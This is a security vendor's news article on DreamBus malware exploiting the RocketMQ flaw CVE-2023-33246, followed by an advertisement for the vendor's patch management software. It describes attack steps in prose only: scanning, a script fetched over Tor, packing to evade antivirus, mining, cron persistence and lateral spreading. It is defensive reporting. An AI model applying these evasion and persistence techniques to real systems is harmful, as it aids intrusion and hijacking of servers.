Heimdal
article featured image

Contents:

Threat actors exploit a known remote code vulnerability in RocketMQ servers to infect devices with DreamBus malware.

CVE-2023-33246 was discovered in May 2023 and received a 9.8 score, which labels it as critical. It is a permission verification issue that impacts RocketMQ version 5.1.0 and older, allowing attackers to perform remote code execution under certain conditions. Users of RocketMQ versions 5.1.0 and below risk falling victim to remote code execution.

How DreamBus Malware Exploits the RocketMQ Vulnerability

According to researchers, DreamBus started taking advantage of CVE-2023-33246 in June 2023. The malicious actors targeted RocketMQ’s default 10911 port and seven other ports. In order to find out which devices were vulnerable, they leveraged the ‘interactsh’ free reconnaissance tool. Thus, unpatched servers became their target.

Additionally, hackers found a way to avoid AV detection by downloading a ”reketed” bash script from a Tor proxy service.

The DreamBus main module uses ”reketed” as a downloader and installer. After the execution, the file (ELF) is deleted, as an obfuscation measure.

Also, custom UPX packing makes DreamBus go undetected by VirusTotal AV`s scans.

DreamBus has several base64-encoded scripts that enable downloading additional malware.

Some of the tasks these additional malware strains perform are

  • downloading the XMRig Monero miner,
  • running more bash scripts,
  • deploying a new malware version.

By setting up a system service and a cron job that run once an hour, the malware ensures persistence on the infected device.

Additionally, DreamBus uses lateral spreading mechanisms (ansible, knife, salt, and pssh), as well as a vulnerability scanner.

The Risks of DreamBus Malware Infection

For now, Monero mining seems to be the purpose of the DreamBus malware campaign. However, the complexity of the malware can easily enable hackers to switch focus and expand their capabilities.

Apache RocketMQ is a free of charge messaging and data processing cloud-based platform created for messaging applications. At the moment, some of the companies that use Apache RocketMQ are TikTok, Huawei Technologies, and Alibaba Group.

Companies use RocketMQ servers in communications. So, hackers could leverage CVE-2023-33246 to gain access to sensitive conversation data that go through unpatched devices.

DreamBus Malware Attacks Prevention Measures

Avoid being a victim of a DreamBus malware attack by upgrading RockerMQ to version 5.1.1 or later. Automated patch management solutions will keep al software up to date with a minimum use of the security team`s time.

Heimdal®`s 3rd Party Patch Management monitors and patches in time any 3rd Party Application a company might use. In addition, the Infinity Management module offers even more flexibility. On Windows, security teams can use the Infinity Management to:

  • Install automatically 3rd Party Applications that Heimdal Security does not manage,
  • Update automatically 3rd Party Applications added in the Infinity Management module,
  • Enable users to install manually 3rd Party Applications visible in the Heimdal

The module can also be used on Linux, to automatically:

  • Install 3rd Party Applications that Heimdal Security does not yet manage,
  • Update 3rd Party Applications that were added in the Infinity Management module.

Thus, security admins can make sure that all software running on the company`s assets is properly patched and safe.

If you liked this article, follow us on LinkedIn, Twitter, Facebook, and Youtube, for more cybersecurity news and topics.

Heimdal Official Logo
Automate your patch management routine.

Heimdal® Patch & Asset Management Software

Remotely and automatically install Windows, Linux and 3rd party application updates and manage your software inventory.
  • Schedule updates at your convenience;
  • See any software assets in inventory;
  • Global deployment and LAN P2P;
  • And much more than we can fit in here...
Try it for FREE today 30-day Free Trial. Offer valid only for companies.
Author Profile

Livia Gyongyoși

Communications and PR Officer

Livia Gyongyoși is a Communications and PR Officer within Heimdal®, passionate about cybersecurity. Always interested in being up to date with the latest news regarding this domain, Livia's goal is to keep others informed about best practices and solutions that help avoid cyberattacks.

CHECK OUR SUITE OF 11 CYBERSECURITY SOLUTIONS

SEE MORE